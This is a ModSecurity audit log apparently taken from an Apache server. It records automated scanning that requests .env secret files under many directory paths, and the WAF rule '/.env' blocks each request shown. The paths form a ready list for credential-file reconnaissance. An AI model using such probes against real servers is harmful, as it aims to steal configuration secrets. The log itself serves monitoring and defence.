Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed2cc810-Z-- --bef42e09-A-- [11/May/2025:14:31:23 +0700] aCBSSwpy530QiWmSS61dIQAAAEE 103.236.140.4 54526 103.236.140.4 8181 --bef42e09-B-- GET /app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --bef42e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bef42e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948683605881 769 (- - -) Stopwatch2: 1746948683605881 769; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bef42e09-Z-- --023e2b3b-A-- [11/May/2025:14:31:24 +0700] aCBSTApy530QiWmSS61dIgAAAEM 103.236.140.4 54528 103.236.140.4 8181 --023e2b3b-B-- POST /app/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --023e2b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --023e2b3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948684287354 695 (- - -) Stopwatch2: 1746948684287354 695; combined=301, p1=271, p2=0, p3=0, p4=0, p5=30, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --023e2b3b-Z-- --dc826234-A-- [11/May/2025:14:31:24 +0700] aCBSTEEuxCpmyy5aJPm7lAAAAA8 103.236.140.4 54530 103.236.140.4 8181 --dc826234-B-- GET /development/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --dc826234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc826234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948684826146 664 (- - -) Stopwatch2: 1746948684826146 664; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc826234-Z-- --9490fd4a-A-- [11/May/2025:14:31:25 +0700] aCBSTU8xOExV7lPH_Dl_5QAAANM 103.236.140.4 54532 103.236.140.4 8181 --9490fd4a-B-- POST /development/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --9490fd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9490fd4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948685343856 797 (- - -) Stopwatch2: 1746948685343856 797; combined=309, p1=267, p2=0, p3=0, p4=0, p5=41, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9490fd4a-Z-- --991ff740-A-- [11/May/2025:14:31:25 +0700] aCBSTQpy530QiWmSS61dIwAAAEk 103.236.140.4 54534 103.236.140.4 8181 --991ff740-B-- GET /apps/.env%20 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.176 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.176 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --991ff740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991ff740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948685969939 663 (- - -) Stopwatch2: 1746948685969939 663; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991ff740-Z-- --1ebdb770-A-- [11/May/2025:14:31:38 +0700] aCBSWgpy530QiWmSS61dJAAAAEg 103.236.140.4 54542 103.236.140.4 8181 --1ebdb770-B-- GET /private/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --1ebdb770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebdb770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948698163410 773 (- - -) Stopwatch2: 1746948698163410 773; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebdb770-Z-- --516d4b77-A-- [11/May/2025:14:31:43 +0700] aCBSXwpy530QiWmSS61dJQAAAFc 103.236.140.4 54544 103.236.140.4 8181 --516d4b77-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --516d4b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --516d4b77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948703941555 655 (- - -) Stopwatch2: 1746948703941555 655; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --516d4b77-Z-- --4272b22a-A-- [11/May/2025:14:31:50 +0700] aCBSZgpy530QiWmSS61dJgAAAFQ 103.236.140.4 54546 103.236.140.4 8181 --4272b22a-B-- GET /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --4272b22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4272b22a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948710596109 559 (- - -) Stopwatch2: 1746948710596109 559; combined=250, p1=225, p2=0, p3=0, p4=0, p5=25, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4272b22a-Z-- --fab73a27-A-- [11/May/2025:14:31:50 +0700] aCBSZkEuxCpmyy5aJPm7lQAAAAw 103.236.140.4 54548 103.236.140.4 8181 --fab73a27-B-- POST /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --fab73a27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab73a27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948710972780 677 (- - -) Stopwatch2: 1746948710972780 677; combined=260, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab73a27-Z-- --254e8602-A-- [11/May/2025:14:31:51 +0700] aCBSZwpy530QiWmSS61dJwAAAEc 103.236.140.4 54550 103.236.140.4 8181 --254e8602-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --254e8602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --254e8602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948711340852 785 (- - -) Stopwatch2: 1746948711340852 785; combined=301, p1=263, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --254e8602-Z-- --3ebb9f08-A-- [11/May/2025:14:31:51 +0700] aCBSZ0EuxCpmyy5aJPm7lgAAAAQ 103.236.140.4 54552 103.236.140.4 8181 --3ebb9f08-B-- POST /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.178 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --3ebb9f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ebb9f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948711683564 640 (- - -) Stopwatch2: 1746948711683564 640; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ebb9f08-Z-- --ee77e04a-A-- [11/May/2025:14:31:52 +0700] aCBSaE8xOExV7lPH_Dl_5gAAAM4 103.236.140.4 54554 103.236.140.4 8181 --ee77e04a-B-- GET /cms/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --ee77e04a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee77e04a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712028824 713 (- - -) Stopwatch2: 1746948712028824 713; combined=314, p1=247, p2=0, p3=0, p4=0, p5=66, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee77e04a-Z-- --0cbb4a50-A-- [11/May/2025:14:31:52 +0700] aCBSaApy530QiWmSS61dKAAAAFA 103.236.140.4 54556 103.236.140.4 8181 --0cbb4a50-B-- POST /cms/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --0cbb4a50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cbb4a50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712389714 689 (- - -) Stopwatch2: 1746948712389714 689; combined=274, p1=240, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cbb4a50-Z-- --97c7f662-A-- [11/May/2025:14:31:52 +0700] aCBSaApy530QiWmSS61dKQAAAFI 103.236.140.4 54558 103.236.140.4 8181 --97c7f662-B-- GET /script/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --97c7f662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97c7f662-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948712805366 826 (- - -) Stopwatch2: 1746948712805366 826; combined=306, p1=269, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c7f662-Z-- --7f8f0f08-A-- [11/May/2025:14:31:53 +0700] aCBSaQpy530QiWmSS61dKgAAAEs 103.236.140.4 54562 103.236.140.4 8181 --7f8f0f08-B-- POST /script/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7f8f0f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f8f0f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948713215926 780 (- - -) Stopwatch2: 1746948713215926 780; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f8f0f08-Z-- --f90a6474-A-- [11/May/2025:14:32:00 +0700] aCBScObs1CLLACKj-_zQSwAAAJI 103.236.140.4 54566 103.236.140.4 8181 --f90a6474-B-- GET /application/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --f90a6474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f90a6474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948720297317 727 (- - -) Stopwatch2: 1746948720297317 727; combined=311, p1=277, p2=0, p3=0, p4=0, p5=34, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f90a6474-Z-- --4d85bb43-A-- [11/May/2025:14:32:00 +0700] aCBScE8xOExV7lPH_Dl_5wAAANY 103.236.140.4 54568 103.236.140.4 8181 --4d85bb43-B-- POST /application/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.182 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --4d85bb43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d85bb43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948720664527 656 (- - -) Stopwatch2: 1746948720664527 656; combined=264, p1=232, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d85bb43-Z-- --2c391033-A-- [11/May/2025:14:32:06 +0700] aCBSdubs1CLLACKj-_zQTAAAAIY 103.236.140.4 54574 103.236.140.4 8181 --2c391033-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.180 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.180 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --2c391033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c391033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948726172092 773 (- - -) Stopwatch2: 1746948726172092 773; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c391033-Z-- --a24c575e-A-- [11/May/2025:14:32:06 +0700] aCBSdubs1CLLACKj-_zQTQAAAIg 103.236.140.4 54576 103.236.140.4 8181 --a24c575e-B-- POST /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.179 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --a24c575e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a24c575e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746948726534702 638 (- - -) Stopwatch2: 1746948726534702 638; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a24c575e-Z-- --8dc03178-A-- [11/May/2025:14:32:12 +0700] aCBSfEEuxCpmyy5aJPm7mAAAABM 103.236.140.4 54580 103.236.140.4 8181 --8dc03178-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.196.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.196.177 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --8dc03178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dc03178-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity 